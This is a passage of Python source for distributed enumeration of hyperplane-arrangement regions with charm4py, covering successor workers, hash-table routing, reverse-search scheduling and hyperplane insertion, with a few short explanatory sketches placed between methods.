self.distHashTable.awaitPending(usePosetChecking=self.usePosetChecking, awaitable=True).get()\n # Send a final termination signal:\n self.succGroup.sendAll(-2,awaitable=True).get()\n self.succGroup.closeQueryChannels(awaitable=True).get()\n self.succGroup.flushMessages(ret=True).get()\n\n checkVal = self.distHashTable.levelDone(ret=True).get()\n if not checkVal:\n level = self.N+2\n listenerCount = self.distHashTable.awaitShutdown(ret=True).get()\n\n # If clearTable is set, then the result won't be the full table, so might as well\n # clear what we have in there already (I'm torn about the logic of this behavior...)\n if self.clearTable:\n self.distHashTable.clearHashTable(awaitable=True).get()\n\n doneFuts = [Future() for k in range(len(self.successorProxies))]\n for k in range(len(self.successorProxies)):\n self.successorProxies[k].initList( doneFuts[k] )\n cnt = 0\n for fut in charm.iwait(doneFuts):\n cnt += fut.get()\n\n iFut = Future()\n self.successorProxies[0].initListNew(thisLevel,iFut)\n iFut.get()\n nextLevelSize = 1\n\n # print('Waiting for level done')\n while level < self.N+1 and nextLevelSize > 0:\n # successorProxies = self.succGroup.getProxies(ret=True).get()\n # doneFuts = [Future() for k in range(len(self.successorProxies))]\n # for k in range(len(self.successorProxies)):\n # self.successorProxies[k].initListNew( \\\n # [ i for i in thisLevel[k:len(thisLevel):len(self.posetPElist)] ], \\\n # doneFuts[k]\n # )\n # cnt = 0\n # for fut in charm.iwait(doneFuts):\n # cnt += fut.get()\n\n initFut = Future()\n self.distHashTable.initListening(initFut,queryReturnInfo=self.queryReturnInfo,awaitable=True).get()\n initFut.get()\n self.succGroupFull.startListening(awaitable=True).get()\n\n if not self.useGPU:\n self.succGroup.computeSuccessorsNew(ret=True).get()\n else:\n self.succGroup.computeSuccessorsNewGPU(ret=True).get()\n timedOut = any(self.succGroupFull.getTimeout(ret=True).get())\n if timedOut:\n print('Received timeout on level ' + str(level))\n\n self.distHashTable.awaitPending(usePosetChecking=self.usePosetChecking, awaitable=True).get()\n self.succGroup.sendAll(-2,awaitable=True).get()\n self.succGroup.closeQueryChannels(awaitable=True).get()\n self.succGroup.flushMessages(ret=True).get()\n\n # print('Finished looking for successors on level ' + str(level))\n checkVal = self.distHashTable.levelDone(ret=True).get()\n if not checkVal or timedOut:\n if timedOut: checkVal = None\n break\n # print('Done with level ' + str(level))\n\n # Retrieve faces for all the nodes in the current level\n # print(nextLevelSize)\n if self.retrieveFaces:\n facesFuts = [Future() for _ in range(len(self.posetPElist))]\n for k in range(len(facesFuts)):\n self.succGroupFull[self.posetPElist[k]].retrieveFaces(facesFuts[k])\n faces = {}\n for fut in charm.iwait(facesFuts):\n retPe, facesList = fut.get()\n faces[retPe] = facesList\n\n # nextLevel = self.distHashTable.getLevelList(ret=True).get()\n prevLevelSize = nextLevelSize\n\n nextLevelSize = self.distHashTable.scheduleNextLevel(clearTable=(self.clearTable == 'memory'),ret=True).get()\n self.levelSizes.append(nextLevelSize)\n\n listenerCount = self.distHashTable.awaitShutdown(ret=True).get()\n\n if self.clearTable == 'speed':\n self.distHashTable.clearHashTable(awaitable=True).get()\n\n\n posetLen += nextLevelSize\n # print(posetLen)\n if self.verbose:\n print(f'Finished level {level} of size {prevLevelSize}')\n\n\n # thisLevel = nextLevel\n level += 1\n\n # Note, this print has to go here because this coroutine is only suspending until 
checkNodes is set\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n if self.verbose:\n stats['levelSizes'] = self.levelSizes\n print('Total LPs used: ' + str(stats))\n\n print('Checker returned value: ' + str(checkVal))\n\n # print('Computed a (partial) poset of size: ' + str(len(self.hashTable.keys())))\n print('Computed a (partial) poset of size: ' + str(posetLen))\n\n if timedOut:\n print('Poset computation timed out...')\n # return [i.iINT for i in self.hashTable.keys()]\n self.populated = True\n return checkVal\n\n @coro\n def insertHyperplane(self,newA, newb, normalize=1.0, opts={}):\n nrm = np.linalg.norm(np.hstack([-newA.flatten(), newb.flatten()])) / normalize\n newA = -newA.copy().flatten() / nrm\n newb = copy(newb).flatten() / nrm\n self.oldFlippedConstraints = deepcopy(self.flippedConstraints)\n\n self.flippedConstraints.insertHyperplane(newA, newb)\n aug = self.flippedConstraints\n if aug.N == self.oldFlippedConstraints.N:\n self.succGroup.initialize(aug.N, aug, None, awaitable=True).get()\n self.localVarGroup.setConstraintsOnly(aug,awaitable=True).get()\n return True\n\n localOpts = deepcopy(opts)\n localOpts['method'] = 'insertHyperplane'\n localOpts['clearTable'] = False\n localOpts['sendWitness'] = True\n localOpts['sendFaces'] = True\n localOpts['queryReturnInfo'] = True\n tol = opts['tol'] if 'tol' in opts else 1e-9\n rTol = opts['rTol'] if 'rTol' in opts else 1e-9\n solver = localOpts['solver'] if 'solver' in localOpts else 'glpk'\n lpopts = localOpts['lpopts'] if 'lpopts' in localOpts else None\n\n # From now on, we are going to work in CDD format...\n hyper = np.hstack([-newb, newA])\n\n projWb, subIdx = region_helpers.projectConstraints(aug.constraints[:aug.N,:],hyper,tol=tol,rTol=rTol)\n projFixed, _ = region_helpers.projectConstraints(aug.constraints[aug.N:,:],hyper,subIdx=subIdx,tol=tol,rTol=rTol)\n\n if projWb.shape[1] > 1: # Should be equivalent to self.tll.n >= 2\n pt = region_helpers.findInteriorPoint(projFixed,solver=solver,tol=tol,rTol=rTol,lpopts=lpopts)\n hyperSlice = np.hstack([-hyper[1:(subIdx+1)],-hyper[(subIdx+2):]]).reshape(-1,1)\n is1d = False\n else:\n pt = np.array([[hyper[0]/-hyper[1]]],dtype=np.float64)\n if not np.all(projFixed[:,0] >= -self.tol):\n pt = None\n hyperSlice = np.array([[0]],dtype=np.float64)\n is1d = True\n\n if pt is None:\n print(f'Inserted hyperplane doesn\\'t intersect constraint set...')\n return False\n\n print(hyper[1:].shape)\n print(pt.shape)\n\n ptLift = np.zeros((hyper.shape[0]-1,1),dtype=np.float64)\n ptLift[:subIdx,0] = pt[:subIdx,0]\n ptLift[(subIdx+1):,0] = pt[subIdx:,0]\n ptLift[subIdx,0] = (-1/hyper[subIdx+1]) * (-(hyperSlice.reshape(1,-1) @ pt)[0,0] + hyper[0])\n\n print(np.abs(-hyper[1:].reshape(1,-1) @ ptLift - hyper[0]))\n\n newBaseRegFullTup = tuple(np.nonzero((-aug.constraints[:(aug.N-1),1:] @ ptLift - aug.constraints[:(aug.N-1),0].reshape(-1,1)).flatten() >= tol)[0])\n newBaseRegFull = region_helpers.tupToBytes(newBaseRegFullTup, *region_helpers.byteLenFromN(aug.N))\n rebasePt = region_helpers.findInteriorPoint(aug.getRegionConstraints(newBaseRegFullTup),solver=solver,tol=tol,rTol=rTol,lpopts=lpopts)\n if rebasePt is None:\n rebasePt = region_helpers.findInteriorPoint(aug.getRegionConstraints(newBaseRegFullTup + (aug.N-1,)),solver=solver,tol=tol,rTol=rTol,lpopts=lpopts)\n newBaseRegFullTup = newBaseRegFullTup + (aug.N-1,)\n if rebasePt is None:\n print(f'Couldn\\'t find a new rebase point')\n self.flippedConstraints = self.oldFlippedConstraints\n 
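# insertHyperplane above rescales the incoming hyperplane so that the stacked
# coefficient vector has a fixed norm, which keeps the absolute tol/rTol
# comparisons scale-invariant. A minimal sketch of that normalization under the
# same A @ x <= b reading; normalize_hyperplane is an illustrative helper, not
# part of this module.
import numpy as np

def normalize_hyperplane(A, b, target=1.0):
    scale = np.linalg.norm(np.hstack([A.flatten(), b.flatten()])) / target
    return A / scale, b / scale

A, b = np.array([[2.0, 0.0]]), np.array([4.0])
An, bn = normalize_hyperplane(A, b)
# Same hyperplane, rescaled representation:
assert np.isclose(np.linalg.norm(np.hstack([An.flatten(), bn.flatten()])), 1.0)
assert np.allclose(An / bn, A / b)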
self.oldFlippedConstraints = None\n return False\n\n print(newBaseRegFullTup)\n print(rebasePt)\n\n print(np.allclose(aug.getRegionConstraints(tuple()) , aug.constraints))\n\n # Now we query the poset to find the correct encoding for the region we care about\n # This will be sent with adjUpdate[-1] to bootstrap the process of removing the old node encodings\n f = Future()\n self.distHashTable.initListening(f,queryReturnInfo=True,awaitable=True).get()\n f.get()\n self.succGroup.startListening(awaitable=True).get()\n\n print(f' base N = {aug.baseN} aug.N = {aug.N}')\n\n # Identify the correct encoding of the first region split by the inserted hyperplane (that identified\n # by the point ptLift). That is, determine how many hyperplanes were used to encode this region in the\n # hash table.\n for idx in range(1,aug.N - aug.baseN + 1):\n newBaseReg, newBaseRegTup, newBaseRegN = region_helpers.recodeRegNewN(-idx, newBaseRegFull, aug.N)\n print((newBaseReg, newBaseRegTup, newBaseRegN))\n retVal = self.succGroup[0].query([newBaseReg, newBaseRegTup, newBaseRegN],awaitable=True).get()\n print(retVal)\n if retVal[0] > 0:\n stripNum = idx\n break\n\n self.distHashTable.awaitPending(usePosetChecking=False,awaitable=True).get()\n self.succGroup.sendAll(-2,awaitable=True).get()\n self.succGroup.closeQueryChannels(awaitable=True).get()\n self.succGroup.flushMessages(ret=True).get()\n\n aug.root = tuple(newBaseRegFullTup)\n aug.setRebase(rebasePt)\n self.succGroup.initialize(aug.N, aug, None, awaitable=True).get()\n self.localVarGroup.setConstraintsOnly(aug,awaitable=True).get()\n\n self.distHashTable.setCheckDispatch({'check':'checkForInsert','update':'updateForInsert'},awaitable=True).get()\n\n newAdj = deepcopy(retVal[3])\n newAdj[-1] = (newBaseRegFull,newBaseRegFullTup,aug.N)\n print(newAdj)\n\n self.populated = False\n self.thisProxy.populatePoset(face=set(),witness=rebasePt,adjUpdate=newAdj,payload=retVal[4],opts=localOpts,awaitable=True).get()\n\n # Now that we're all done, restore default dispatch for check/update\n self.distHashTable.setCheckDispatch({'check':'check','update':'update'},awaitable=True).get()\n\n @coro\n def getLPCount(self):\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n return stats\n\n @coro\n def populatePosetRS(self,payload=None, opts={}):\n if self.populated:\n return\n self.verbose = True\n defaultSettings = ['verbose']\n for ky in defaultSettings:\n if ky in opts:\n setattr(self,ky,opts[ky])\n\n opts['reverseSearch'] = True\n self.succGroup.setMethod(**opts)\n self.rsPeScheduler.resetScheduler(verbose=self.verbose,awaitable=True).get()\n\n checkVal = True\n level = 0\n thisLevel = [(self.flippedConstraints.root,)]\n posetLen = 1\n timedOut = False\n\n # Start reverse search on the root on the first PE\n peToUse = self.rsPeScheduler.schedNextFreePE(ret=True).get()\n if peToUse >= 0:\n self.succGroup[peToUse].reverseSearch(self.flippedConstraints.root,payload=(tuple() if payload is None else payload),witness=self.flippedConstraints.pt)\n else:\n print('Error: RS Pe scheduler not configured properly')\n\n checkVal = self.rsPeScheduler.awaitResult(awaitable=True).get()\n\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n regionDist = self.succGroup.getProperty('rsRegionCount',ret=True).get()\n\n if self.verbose:\n print('Total LPs used: ' + str(stats))\n\n print('Checker returned value: ' + str(checkVal))\n\n # print('Computed a (partial) poset of size: ' + str(len(self.hashTable.keys())))\n 
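# populatePosetRS above asks the PE scheduler for a free worker, hands it the
# root region, and then blocks on a result future; peSchedulerRS below services
# those requests from a shrinking free list. A minimal thread-based sketch of
# the same free-pool pattern (charm4py chares replaced by a plain class;
# FreePool and its method names are illustrative, not this module's API).
import threading

class FreePool:
    def __init__(self, workers):
        self._free = list(workers)
        self._lock = threading.Lock()

    def acquire(self):
        # Mirrors schedNextFreePE: -1 means "none free, caller recurses locally".
        with self._lock:
            return self._free.pop() if self._free else -1

    def release(self, worker):
        # Mirrors freePe: when the last outstanding worker comes back, the real
        # scheduler fires its completion future.
        with self._lock:
            self._free.append(worker)

pool = FreePool([0, 1, 2])
w = pool.acquire()
assert w in (0, 1, 2)
pool.release(w)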
print('Computed a (partial) poset of size: ' + str(stats['RSRegionCount']))\n\n print(f'Regions discovered by PE: {regionDist}')\n\n if timedOut:\n print('Poset computation timed out...')\n # return [i.iINT for i in self.hashTable.keys()]\n self.populated = True\n return checkVal\n\n\nclass peSchedulerRS(Chare):\n\n def __init__(self, successorGroup, posetPElist):\n self.succGroup = successorGroup\n self.posetPElist = posetPElist\n self.peFree = copy(self.posetPElist)\n self.resultFut = None\n self.retVal = True\n self.verbose = True\n\n @coro\n def resetScheduler(self,verbose):\n self.verbose = verbose\n self.peFree = copy(self.posetPElist)\n self.succGroup.setPeAvailableRS(True,awaitable=True).get()\n self.resultFut = None\n self.retVal = True\n\n @coro\n def awaitResult(self):\n self.resultFut = Future()\n return self.resultFut.get()\n\n # If there is a PE available, schedule it. If there isn't, return -1 so the successorWorker\n # knows that the scheduling was unsuccessful (as my be the case due to concurrency issues)\n @coro\n def schedNextFreePE(self):\n if not self.retVal:\n return -1\n if len(self.peFree) > 1:\n return self.peFree.pop()\n elif len(self.peFree) == 1:\n lastFreePe = self.peFree.pop()\n self.succGroup.setPeAvailableRS(False,abort=(not self.retVal))\n return lastFreePe\n else:\n return -1\n\n @coro\n def freePe(self,pe):\n # print(f'Free PEs = {self.peFree}; To free = {pe}; retVal = {self.retVal}')\n self.peFree.append(pe)\n if len(self.peFree) == len(self.posetPElist):\n if self.verbose:\n print(f'*** All done! {self.peFree} ***')\n self.resultFut.send(self.retVal)\n self.succGroup.setPeAvailableRS(self.retVal,abort=(not self.retVal))\n\n @coro\n def failAbort(self):\n self.retVal = False\n self.succGroup.setPeAvailableRS(False,abort=True)\n\n # @coro\n # def setrsDone(self):\n # self.succGroup.setrsDone(awaitable=True).get()\n\n\n\nclass successorWorker(Chare):\n\n def initPEs(self,pes,localVarGroup=None,rsScheduler=None):\n self.posetPElist = pes\n self.checkRS= False\n test = getattr(localVarGroup,'checkNodeRS',None)\n if not test is None and callable(localVarGroup.checkNodeRS):\n self.checkRS = True\n self.doRSCleanup = False\n test = getattr(self,'cleanupRS',None)\n if not test is None and callable(self.cleanupRS):\n self.doRSCleanup = True\n self.localVarGroup = localVarGroup\n self.timedOut = False\n self.rsScheduler = rsScheduler\n self.rsPeFree = True\n self.rsDone = False\n self.rsDepth = 0\n self.rsRegionCount = 0\n self.sendFaces = False\n self.sendWitness = False\n self.deferLock = False\n self.hashedNodeCount = 0\n\n def initialize(self,N,constraints,timeout):\n self.workInts = []\n self.N = N\n self.flippedConstraints = constraints\n self.constraints = self.flippedConstraints.constraints\n # self.processNodeSuccessors = partial(successorWorker.processNodeSuccessorsFastLP, self, solver='glpk')\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsFastLP\n self.processNodesArgs = {'solver':'glpk','ret':True}\n # Defaults to glpk, so this empty call is ok:\n self.lp = encapsulateLP.encapsulateLP()\n self.lpIntPoint = encapsulateLP.encapsulateLP()\n self.rsLP = encapsulateLP.encapsulateLP()\n self.rsLPIntPoint = encapsulateLP.encapsulateLP()\n # self.hashChannels = []\n self.clockTimeout = (timeout + time.time()) if timeout is not None else None\n self.timedOut = False\n self.stats = {'LPSolverCount':0, 'xferTime':0, 'numQueries':0, 'successfulQueries':0, 'RSRegionCount':0, 'RSLPCount':0}\n self.rsPeFree = True\n self.rsDone = 
False\n self.rsDepth = 0\n self.rsRegionCount = 0\n @coro\n def getTimeout(self):\n return self.timedOut\n\n def setMethod(self,method='fastLP',solver='glpk',useQuery=False,lpopts={},reverseSearch=False,hashStore='bits',tol=1e-9,rTol=1e-9,sendFaces=False,clearTable='speed',sendWitness=False,verbose=True):\n self.lp.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1]-1)})\n self.lpIntPoint.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1])})\n self.rsLP.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1]-1)})\n self.rsLPIntPoint.initSolver(solver=solver, opts={'dim':(self.constraints.shape[1])})\n self.useQuery = useQuery\n self.doRS = reverseSearch\n self.tol = tol\n self.rTol = rTol\n self.sendFaces = sendFaces\n self.clearTable = clearTable\n self.sendWitness = True if sendWitness else None\n self.verbose = verbose\n if hashStore == 'bits':\n self.hashStoreMode = 0\n elif hashStore == 'list':\n self.hashStoreMode = 1\n elif hashStore == 'vertex':\n self.hashStoreMode = 2\n else:\n self.hashStoreMode = 0\n if method=='cdd':\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsCDD\n self.processNodesArgs = {'solver':solver}\n if self.hashStoreMode == 2:\n print(f'WARNING: vertex region encodings are not supported for method {method}. Defaulting to bit region encodings...')\n elif method=='fastLP':\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsFastLP\n self.processNodesArgs = {'solver':solver}\n if self.hashStoreMode == 2:\n print(f'WARNING: vertex region encodings are not supported for method {method}. Defaulting to bit region encodings...')\n elif method=='insertHyperplane':\n self.processNodeSuccessors = self.thisProxy[self.thisIndex].processNodeSuccessorsInsertHyperplane\n self.processNodesArgs = {'solver':solver}\n if len(lpopts) == 0:\n self.lpopts = {}\n else:\n self.lpopts = deepcopy(lpopts)\n if solver != 'glpk' and not 'fallback' in self.lpopts:\n self.lpopts['fallback'] = {'solver':'glpk'}\n self.lpopts['solver'] = solver\n self.processNodesArgs['lpopts'] = self.lpopts\n self.processNodesArgs['ret'] = True\n self.method = method\n self.solver = solver\n\n self.Hcol0Close = self.tol + self.rTol * np.abs(self.constraints[:,0])\n self.Hcol0CloseVertex = self.constraints[:,0] - self.Hcol0Close\n\n @coro\n def setProperty(self,prop,val):\n setattr(self,prop,val)\n\n @coro\n def getProperty(self,prop):\n return getattr(self,prop)\n\n @coro\n def setPeAvailableRS(self,status,abort=False):\n self.rsPeFree = status\n if abort:\n self.rsDone = True\n\n @coro\n def getStats(self, statsFut):\n if charm.myPe() in self.posetPElist:\n self.stats['LPSolverCount'] = self.lp.lpCount + self.lpIntPoint.lpCount\n self.stats['RSRegionCount'] = self.rsRegionCount\n self.stats['RSLPCount'] = self.rsLP.lpCount + self.rsLPIntPoint.lpCount\n retVal = defaultdict(int) if not charm.myPe() in self.posetPElist else self.stats\n self.reduce(statsFut,retVal,DictAccum)\n\n @coro\n def getProxies(self):\n return self.thisProxy[self.thisIndex]\n @coro\n def initHashChannel(self, procGroupProxies):\n if not charm.myPe() in self.posetPElist:\n return\n self.numHashWorkers = len(procGroupProxies)\n self.hashChannels = [Channel(self, remote=proxy) for proxy in procGroupProxies]\n self.numHashBits = 1\n while self.numHashBits < self.numHashWorkers:\n self.numHashBits = self.numHashBits << 1\n self.hashMask = self.numHashBits - 1\n self.numHashBits -= 1\n # if self.N % 4 == 0:\n # self.numBytes = self.N/4\n # 
else:\n # self.numBytes = int(self.N/4)+1\n # print(self.hashChannels)\n\n @coro\n def initQueryChannel(self, procGroupProxies, distHashProxy):\n if not charm.myPe() in self.posetPElist:\n return\n # self.numHashWorkers = len(procGroupProxies)\n self.queryChannels = [Channel(self, remote=proxy) for proxy in procGroupProxies]\n self.queryMutexChannel = None\n if not self.rateChannel is None:\n self.queryMutexChannel = Channel(self, remote=distHashProxy)\n # self.numHashBits = 1\n # while self.numHashBits < self.numHashWorkers:\n # self.numHashBits = self.numHashBits << 1\n # self.hashMask = self.numHashBits - 1\n # self.numHashBits -= 1\n # if self.N % 4 == 0:\n # self.numBytes = self.N/4\n # else:\n # self.numBytes = int(self.N/4)+1\n # print(self.hashChannels)\n\n @coro\n def closeQueryChannels(self):\n if not charm.myPe() in self.posetPElist:\n return\n for ch in self.queryChannels:\n ch.send(-2)\n if not self.queryMutexChannel is None:\n self.queryMutexChannel.send(-2)\n\n @coro\n def initRateChannel(self,overlapPElist ):\n self.rateChannel = None\n self.overlapPElist = overlapPElist\n if not charm.myPe() in self.posetPElist:\n return\n if charm.myPe() in overlapPElist:\n self.rateChannel = Channel(self,remote=overlapPElist[charm.myPe()][1])\n # self.feedbackChannel = Channel(self,remote=proxy)\n @coro\n def testSend(self):\n for k in range(self.numHashWorkers):\n #print('Sending on to ' + str(k))\n #print(self.hashChannels[k])\n self.hashChannels[k].send((self.thisIndex,k))\n #print('Message sent!')\n\n def startListening(self):\n self.hashedNodeCount = 0\n if not charm.myPe() in self.posetPElist:\n return\n for ch in self.hashChannels:\n ch.send(-100)\n\n def hashNode(self,toHash,payload=None,vertex=None,adjUpdate=False):\n # hashInt = int(posetFastCharm_numba.hashNodeBytes(np.array(toHash[0],dtype=np.uint8)))\n # hashInt = hashNodeBytes(np.array(toHash[0],dtype=np.uint8))\n hashInt = hashNodeBytes(toHash[0])\n if self.hashStoreMode == 0:\n regEncode = toHash[0]\n elif self.hashStoreMode == 1:\n regEncode = tuple(toHash[1])\n elif self.hashStoreMode == 2 and vertex is not None:\n regEncode = vertex\n else:\n # default to tuple mode\n regEncode = tuple(toHash[1])\n N = toHash[2]\n if len(toHash) >= 4:\n face = toHash[3]\n else:\n face = tuple()\n if len(toHash) >= 5:\n witness = toHash[4]\n else:\n witness = None\n if payload is not None:\n return ( (hashInt & self.hashMask) % self.numHashWorkers , hashInt >> self.numHashBits, regEncode, N, charm.myPe(), face, witness, adjUpdate, payload)\n else:\n return ( (hashInt & self.hashMask) % self.numHashWorkers , hashInt >> self.numHashBits, regEncode, N, charm.myPe(), face, witness, adjUpdate )\n\n @coro\n def hashAndSend(self,toHash,payload=None,vertex=None,adjUpdate=False):\n self.hashedNodeCount += 1\n val = self.hashNode(toHash,payload=payload,vertex=vertex,adjUpdate=adjUpdate)\n self.hashChannels[val[0]].send(val)\n # print('Trying to hash integer ' + str(nodeInt))\n # retVal = self.thisProxy[self.thisIndex].deferControl(code=5,ret=True).get()\n retVal = self.thisProxy[self.thisIndex].deferControl(ret=True).get()\n # print('Saw defercontrol return the following within HashAndSend ' + str(retVal))\n return retVal\n @coro\n def getHashedNodeCount(self):\n return self.hashedNodeCount\n @coro\n def resetHashedNodeCount(self):\n self.hashedNodeCount = 0\n @coro\n def decHashedNodeCount(self):\n self.hashedNodeCount -= 1\n\n def decodeRegionStore(self,INTrep):\n if type(INTrep) == tuple and len(INTrep) == 2 and type(INTrep[1]) is tuple:\n 
incommingINTrep = INTrep\n Hsol = (-self.constraints[:,1:] @ INTrep[0]).flatten()\n flipIdxs = (Hsol > self.Hcol0CloseVertex).flatten().astype(np.bool8)\n # print(flipIdxs)\n intersectionIdxs = np.nonzero((np.abs(Hsol - self.constraints[:,0]) <= self.Hcol0Close).flatten())[0]\n # print(intersectionIdxs)\n flipIdxs[intersectionIdxs] = np.zeros(intersectionIdxs.shape,dtype=np.bool8)\n flipIdxs[list(INTrep[1])] = np.ones(len(INTrep[1]),dtype=np.bool8)\n INTrep = tuple(np.nonzero(flipIdxs)[0])\n # print(f'{INTrep}==>{(incommingINTrep[0].flatten().tolist(),incommingINTrep[1])}')\n if type(INTrep) == tuple:\n intIdxNoFlip = list(INTrep)\n boolIdxNoFlip = tupToBytes(INTrep, self.flippedConstraints.wholeBytes, self.flippedConstraints.tailBits)\n intIdx = list(range(self.N))\n # boolIdx[-1] = boolIdx[-1] & ((1<<(self.tailBits+1))-1)\n for unflipIdx in range(len(INTrep)-1,-1,-1):\n intIdx.pop(INTrep[unflipIdx])\n # boolIdxNoFlip = np.full(self.N,False,dtype=bool)\n # boolIdxNoFlip[INTrep,] = np.full(len(INTrep),True,dtype=bool)\n # intIdx = np.where(boolIdxNoFlip==0)[0]\n # boolIdxNoFlip = np.packbits(boolIdxNoFlip,bitorder='little')\n elif type(INTrep) == bytearray:\n boolIdxNoFlip = INTrep\n INTrep = bytesToList(boolIdxNoFlip, self.flippedConstraints.wholeBytes, self.flippedConstraints.tailBits)\n intIdxNoFlip = INTrep\n INTrep = tuple(intIdxNoFlip)\n intIdx = list(range(self.N))\n # boolIdx[-1] = boolIdx[-1] & ((1<<(self.tailBits+1))-1)\n for unflipIdx in range(len(INTrep)-1,-1,-1):\n intIdx.pop(INTrep[unflipIdx])\n\n return INTrep, boolIdxNoFlip, intIdx, intIdxNoFlip\n\n @coro\n def deferControl(self, code=1):\n if not self.rateChannel is None:\n while self.deferLock:\n suspendFut = Future()\n suspendFut.send(1)\n suspendFut.get()\n self.deferLock = True\n self.rateChannel.send(code)\n control = self.rateChannel.recv()\n while control > 0:\n control = self.rateChannel.recv()\n if control == -3:\n self.deferLock = False\n return False\n self.deferLock = False\n return True\n\n @coro\n def query(self, q, op=None):\n qOp = 0\n if isinstance(op,int):\n qOp = op\n # print('PE' + str(charm.myPe()) + ' Query to send is ' + str(q))\n self.stats['numQueries'] += 1\n val = self.hashNode(q)\n self.queryChannels[val[0]].send((qOp,) + val)\n # print('PE' + str(charm.myPe()) + ' sending query ' + str(val))\n if not self.queryMutexChannel is None:\n self.queryMutexChannel.send(charm.myPe())\n # print('Waiting for query mutex on PE ' + str(charm.myPe()))\n self.queryMutexChannel.recv()\n # print('Received query mutex on PE ' + str(charm.myPe()))\n if charm.myPe() == val[0]:\n self.thisProxy[self.thisIndex].deferControl(code=3,ret=True).get()\n # print('Got Control Back from self query')\n else:\n self.thisProxy[self.thisIndex].deferControl(code=4,ret=True).get()\n # print('Got Control Back.')\n self.queryMutexChannel.send(1)\n retVal = self.queryChannels[val[0]].recv()\n # print('^^^^^^ Received answer to query ' + str(q) + ' of ' + str(retVal))\n if retVal[0] > 0:\n self.stats['successfulQueries'] += 1\n return retVal\n\n @coro\n def tester(self):\n print('Entered tester on PE ' + str(charm.myPe()))\n return charm.myPe()\n # @coro\n # def initList(self,workInts):\n # self.status = Future()\n # self.workInts = workInts\n # self.status.send(1)\n\n @coro\n def initListNew(self,workInts, fut):\n self.workInts = workInts\n # print(self.workInts)\n fut.send(1)\n\n @coro\n def initList(self,fut):\n self.workInts = []\n fut.send(1)\n\n @coro\n def appendToWorkList(self,li,fut):\n self.workInts.extend(li)\n 
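# query and hashAndSend above route every region to a hash worker using the low
# bits of its node hash: mask with (next power of two above the worker count)
# minus one, reduce modulo the worker count, and keep the remaining high bits
# as the stored hash. A simplified sketch of that routing arithmetic
# (routing_params/route are illustrative names, and the exact shift amount in
# the real hashNode differs slightly):
def routing_params(num_workers):
    bits = 1
    while bits < num_workers:
        bits <<= 1
    mask = bits - 1
    return mask, mask.bit_length()

def route(hash_int, num_workers):
    mask, nbits = routing_params(num_workers)
    return (hash_int & mask) % num_workers, hash_int >> nbits

worker, stored_hash = route(0b10110110, 3)
assert 0 <= worker < 3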
fut.send(len(li))\n\n #@coro\n def sendAll(self,val):\n if not charm.myPe() in self.posetPElist:\n return\n for ch in self.hashChannels:\n ch.send(val)\n\n @coro\n def flushMessages(self):\n if not charm.myPe() in self.overlapPElist:\n return\n self.rateChannel.send(2)\n\n\n\n @coro\n def computeSuccessorsNew(self):\n term = False\n if len(self.workInts) > 0:\n successorList = [[None,None,None,None,None,None,None] for k in range(len(self.workInts))]\n for ii in range(len(successorList)):\n successorList[ii] = self.processNodeSuccessors(self.workInts[ii][0],self.N,self.constraints,**self.processNodesArgs,witness=self.workInts[ii][4], payload=self.workInts[ii][6],xN=self.workInts[ii][1],face=self.workInts[ii][3],adj=self.workInts[ii][5], awaitable=True).get()\n self.timedOut = (time.time() > self.clockTimeout) if self.clockTimeout is not None else False\n # print('Working on ' + str(self.workInts[ii]) + 'on PE ' + str(charm.myPe()) + '; with timeout ' + str(self.timedOut))\n if type(successorList[ii][1]) is int or self.timedOut:\n term = True\n if self.timedOut:\n successorList[ii][1] = -1\n break\n else:\n successorList = [[set([]),-1]]\n\n # self.thisProxy[self.thisIndex].sendAll(-2 if not term else -3, awaitable=True).get()\n if term:\n self.thisProxy[self.thisIndex].sendAll(-3, awaitable=True).get()\n self.thisProxy[self.thisIndex].flushMessages(awaitable=True).get()\n\n\n self.workInts = [successorList[ii][1] for ii in range(len(successorList))]\n # successorList = [successorList[ii][0] for ii in range(len(successorList))]\n\n @coro\n def reverseSearch(self,INTrep,payload=None,witness=None):\n #print(f'PE {charm.myPe()}: working on {INTrep}')\n #print(f'PE {charm.myPe()} working on region {INTrep}')\n if self.rsDone:\n if self.rsDepth == 0:\n self.rsScheduler.freePe(charm.myPe(),awaitable=True).get()\n return\n\n self.rsDepth += 1\n\n if self.checkRS:\n # INTrep2, boolIdxNoFlip, intIdx, intIdxNoFlip = self.decodeRegionStore(INTrep)\n tempRetVal = self.localVarGroup[charm.myPe()].checkNodeRS(INTrep,payload=payload, witness=witness, ret=True).get()\n # print(f'{charm.myPe()} --> INTrep = {INTrep2}; boolIdxNoFlip = {boolIdxNoFlip}; intIdx = {intIdx}; intIdxNoFlip = {intIdxNoFlip}; witness = {witness}; retVal = {tempRetVal}')\n if not tempRetVal:\n self.rsDone = True\n self.rsPeFree = False\n self.rsDepth -= 1\n self.rsScheduler.failAbort()\n if self.rsDepth == 0:\n self.rsScheduler.freePe(charm.myPe(),awaitable=True).get()\n return\n # Compute all of the adjacent nodes (from among the unflipped hyperplanes)\n H2 = self.constraints.copy()\n successorList, _, witnessList = self.processNodeSuccessors(INTrep,self.N,H2,**self.processNodesArgs,payload=payload,witness=witness).get()\n if type(witnessList) is list and len(witnessList) == len(successorList):\n findWitnessLocally = False\n else:\n #print(f'PE {charm.myPe()}: successorList = {successorList}; witnessList = {witnessList}')\n findWitnessLocally = True\n witnessList = []\n #print(f'PE {charm.myPe()}: successors of {INTrep} are {successorList}')\n self.rsRegionCount += 1\n #print(f'PE {charm.myPe()} working on region {INTrep}; found successors {successorList}')\n\n for ii in range(len(successorList)):\n # Put check for path to root here...\n H = self.constraints.copy()\n H[successorList[ii][1],:] = -H[successorList[ii][1],:]\n if findWitnessLocally:\n interiorPoint = region_helpers.findInteriorPoint(H,lpObj=self.rsLPIntPoint,lpopts=self.lpopts)\n witnessList.append(interiorPoint)\n else:\n interiorPoint = witnessList[ii]\n # If the ray 
